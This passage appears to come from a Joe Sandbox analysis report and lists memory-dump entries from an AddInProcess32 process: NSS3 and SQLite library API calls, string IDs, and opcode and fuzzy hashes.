                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: recovered %d frames from WAL file %s
                                                                                      • API String ID: 2221118986-1429783703
                                                                                      • Opcode ID: a9e4046e6bc8ccd501832d89694fccb94f9b42202738945157ac6c1ca705236c
                                                                                      • Instruction ID: a91995c5bece1025afb076a7612fd39a641a8f63e043238e85b0d44948fc1950
                                                                                      • Opcode Fuzzy Hash: a9e4046e6bc8ccd501832d89694fccb94f9b42202738945157ac6c1ca705236c
                                                                                      • Instruction Fuzzy Hash: 40A17971D00608AFDB14CFE8C885B9EB7F5EF48318F244469E509EBB84E775E9058B60
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: __cftof
                                                                                      • String ID: sqlite_stat1
                                                                                      • API String ID: 1622813385-692927832
                                                                                      • Opcode ID: db459dc8a63eba17bd6fb8e7455fc6a041b85b81e4bf96552203bc06ab8fded7
                                                                                      • Instruction ID: a73a1ec2629fea82ecf4603520f50fae9caa66d8883c357a29f5d6f1a48be93c
                                                                                      • Opcode Fuzzy Hash: db459dc8a63eba17bd6fb8e7455fc6a041b85b81e4bf96552203bc06ab8fded7
                                                                                      • Instruction Fuzzy Hash: D281CD7190420ABFEF018FA4CC01FEE7BB8FF09314F144159F915A6690F7369AA18BA4
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001,FFFFE001,00000050,00000000,?,6CD4BECC,00000050,00000002,00000001,00000000), ref: 6CD489FA
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PK11_FreeSymKey.NSS3(00000001,?,?,?,?,?,?,?,?,FFFFE001,00000050,00000000,?,6CD4BECC,00000050,00000002), ref: 6CD48AA3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorError_FreeK11_Util
                                                                                      • String ID: key
                                                                                      • API String ID: 923999773-2324736937
                                                                                      • Opcode ID: 2f4b35bf38c8a60bf44c2c0da95d95ff0c8f21a6bbfa634d886bcf1036b5a473
                                                                                      • Instruction ID: 3cfcf984704c9f9d89a85c18029962e120706066f5439d4f932d583bb6c466b4
                                                                                      • Opcode Fuzzy Hash: 2f4b35bf38c8a60bf44c2c0da95d95ff0c8f21a6bbfa634d886bcf1036b5a473
                                                                                      • Instruction Fuzzy Hash: C931E4B2500204EFD718CF18CD81FAAB7B4FF44354F108169EA089BBA0D770E910CBA4
                                                                                      APIs
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC64D62
                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6CC64D6F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_value_text
                                                                                      • String ID: %.*s"%w"%s
                                                                                      • API String ID: 348685305-442545016
                                                                                      • Opcode ID: e65b838302d29e2e5aa1b269a1dbbcb8b2502cb7d8951c13c4efb7d873e7c2d0
                                                                                      • Instruction ID: 55c73f09bd7255894b31f78853aa7a63159192e009853f3262689789ee44f764
                                                                                      • Opcode Fuzzy Hash: e65b838302d29e2e5aa1b269a1dbbcb8b2502cb7d8951c13c4efb7d873e7c2d0
                                                                                      • Instruction Fuzzy Hash: 3B21D535900109BFDB14CE6ACDD0ABEBBB9EF41328F34015EE92592E90F7314D908781
                                                                                      APIs
                                                                                      • sqlite3_mprintf.NSS3(SELECT %s WHERE rowid = ?,?,00000000,?,00000001,?,?,6CC7896A,?,?,00000000,?,6CC9B868,00000000,?,?), ref: 6CC78A06
                                                                                      Strings
                                                                                      • SELECT %s WHERE rowid = ?, xrefs: 6CC78A01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mprintf
                                                                                      • String ID: SELECT %s WHERE rowid = ?
                                                                                      • API String ID: 4246442610-866778640
                                                                                      • Opcode ID: 1e07ad347628f125d4083892ba2aeb5a843203111739db3196189433ea5462c7
                                                                                      • Instruction ID: a812b17f231f68c53d57844c152e64ec3613820f43159a6796e90a239bdc3f41
                                                                                      • Opcode Fuzzy Hash: 1e07ad347628f125d4083892ba2aeb5a843203111739db3196189433ea5462c7
                                                                                      • Instruction Fuzzy Hash: 7101D671504215AFDF21CB4AD880F89BBA8EF057B4F1442A6F91CABA41E331994087E0
                                                                                      APIs
                                                                                      • SetThreadPriority.KERNEL32(?,00000000,?,6CCCFE1A,?,00000001), ref: 6CCD000D
                                                                                      • PR_LogPrint.NSS3(PR_SetThreadPriority: can't set thread priority,?,6CCCFE1A,?,00000001), ref: 6CCD0027
                                                                                      Strings
                                                                                      • PR_SetThreadPriority: can't set thread priority, xrefs: 6CCD0022
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrintPriorityThread
                                                                                      • String ID: PR_SetThreadPriority: can't set thread priority
                                                                                      • API String ID: 2430746717-2919301067
                                                                                      • Opcode ID: d6a98798bdb32833a1c4cc2c0842b5511f2c9d85ab9bf534407047b2d43d06cb
                                                                                      • Instruction ID: aa8b1174428817bc68ee2ddbc897577300cccd851f614d46749ab46e473b4259
                                                                                      • Opcode Fuzzy Hash: d6a98798bdb32833a1c4cc2c0842b5511f2c9d85ab9bf534407047b2d43d06cb
                                                                                      • Instruction Fuzzy Hash: 5AF0963135A142AFEB084B3D9D5AE1737E9EB07719B15822EF316CADD0F621F941D601
                                                                                      APIs
                                                                                      • sqlite3_mprintf.NSS3(%s_stat,?), ref: 6CC80941
                                                                                        • Part of subcall function 6CC63B3B: sqlite3_initialize.NSS3(?,6CC63A78,6CD51024,?,?), ref: 6CC63B3E
                                                                                        • Part of subcall function 6CC68773: sqlite3_mutex_enter.NSS3(?,00000000,?,?), ref: 6CC68798
                                                                                      • sqlite3_free.NSS3(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6CC80967
                                                                                        • Part of subcall function 6CC63D46: sqlite3_mutex_enter.NSS3(00000000,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D60
                                                                                        • Part of subcall function 6CC63D46: PR_Free.NSS3(6CCB8B5E,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D79
                                                                                        • Part of subcall function 6CC63D46: sqlite3_mutex_leave.NSS3(?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D85
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_enter$Freesqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_leave
                                                                                      • String ID: %s_stat
                                                                                      • API String ID: 1482807625-920702477
                                                                                      • Opcode ID: fcd754cbcf07689a3e8d88cb35c499ae33f227b7f11ce15c008313291cbd58f0
                                                                                      • Instruction ID: ffbd26d6335df01235a0cc167e2808557fe76afb9f17929829745708da7aeed6
                                                                                      • Opcode Fuzzy Hash: fcd754cbcf07689a3e8d88cb35c499ae33f227b7f11ce15c008313291cbd58f0
                                                                                      • Instruction Fuzzy Hash: 0EF0B4379062906AEF014E67ECC0B8B7F59EF85268F0841A6FD085EA02E621D4558360
                                                                                      APIs
                                                                                      • PR_NewLock.NSS3(00000000,6CCF4429), ref: 6CCEEF11
                                                                                      • PL_InitArenaPool.NSS3(00000000,NSS,00000800,00000008), ref: 6CCEEF3F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArenaInitLockPool
                                                                                      • String ID: NSS
                                                                                      • API String ID: 3425660916-3870390017
                                                                                      • Opcode ID: 34664838d7e469e6343bee502ca3a4e0d1b8e07c3a8b37526bbd7df977bda556
                                                                                      • Instruction ID: 7fb5c1cbbb5c580dcc8c8b0137cff00b633dcc7652e7644c1111cd3f3c41ead0
                                                                                      • Opcode Fuzzy Hash: 34664838d7e469e6343bee502ca3a4e0d1b8e07c3a8b37526bbd7df977bda556
                                                                                      • Instruction Fuzzy Hash: F6E02B3324D6216EFB526B6A7C00BDB27A4EB1B7E4F00401AF504A9AC1FF51580AC6D8
                                                                                      APIs
                                                                                      • PR_LogPrint.NSS3(PRGetTraceOption: PRTraceBufSize: %ld,00000000), ref: 6CCD8EF7
                                                                                      Strings
                                                                                      • PRGetTraceOption: Invalid command %ld, xrefs: 6CCD8ED4
                                                                                      • PRGetTraceOption: PRTraceBufSize: %ld, xrefs: 6CCD8EF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Print
                                                                                      • String ID: PRGetTraceOption: Invalid command %ld$PRGetTraceOption: PRTraceBufSize: %ld
                                                                                      • API String ID: 3558298466-4881500
                                                                                      • Opcode ID: f134247a416d2e4c861fa23539ee2fd16bf5dccece429cdec596601d9362c120
                                                                                      • Instruction ID: 2b3496cf5369080391f02f681a4194a83094ec479083ffb0e97cf07d07d871ef
                                                                                      • Opcode Fuzzy Hash: f134247a416d2e4c861fa23539ee2fd16bf5dccece429cdec596601d9362c120
                                                                                      • Instruction Fuzzy Hash: 20E0923420A10AEFEB018F44D545E4237E9F702328B82905AF60A4FE60E730F844CF85